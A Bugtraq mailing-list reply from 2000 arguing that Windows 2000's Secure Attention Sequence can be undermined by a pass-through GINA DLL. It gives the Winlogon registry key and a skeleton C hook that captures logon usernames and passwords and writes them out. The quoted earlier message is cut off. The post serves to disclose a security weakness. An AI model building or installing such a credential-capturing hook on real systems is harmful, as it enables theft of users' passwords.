From: jdglaser [jdglaser@ntobjectives.com] Sent: Monday, January 24, 2000 9:32 AM To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: Windows 2000 Run As... Feature That's a good point. I'd like to add that MS Secure Attention Sequence is not exactly so trusted. Nothing prevents another Gina from being put into play, nor prevents process code injection - DLL API hooking. One way to do this can be done by altering the reg key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon to implement a Pass-Through Gina (one which grabs your password and then calls through to the real Gina) While SAS prevents the old-style pop and disappear logon screens, it does nothing to prevent password interception by trojan dll injection. Both of these compromise the trust of the current SAS implemetation. In light of that, I'm not sure another password path matters. Just my thoughts, jdg Attached is an example of GINA pass-through code - pop the below listed code into a dll, write the dll name as the value to the above listed key and SAS now has an untrusted element. int WINAPI WlxLoggedOutSAS (PVOID pWlxContext, DWORD dwSasType, PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions, PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo, PVOID *pProfile) { //call real gina api iRet = GWlxLoggedOutSAS (pWlxContext, dwSasType, pAuthenticationId, pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile); pMprNotifyInfo->pszUserName, <-Grab this pMprNotifyInfo->pszPassword, <-Grab this hFile = CreateFile (); <-Store it, send it, mail it WriteFile (); CloseHandle (hFile); return iRet; } -----Original Message----- From: David Terrell [SMTP:dbt@meat.net] Sent: Friday, January 21, 2000 3:49 PM To: BUGTRAQ@SECURITYFOCUS.COM Subject: Windows 2000 Run As... Feature >this is the first time (I know of) that the system asks for your password >through a mechanism other than the trusted path (ctrl-alt-del to >login,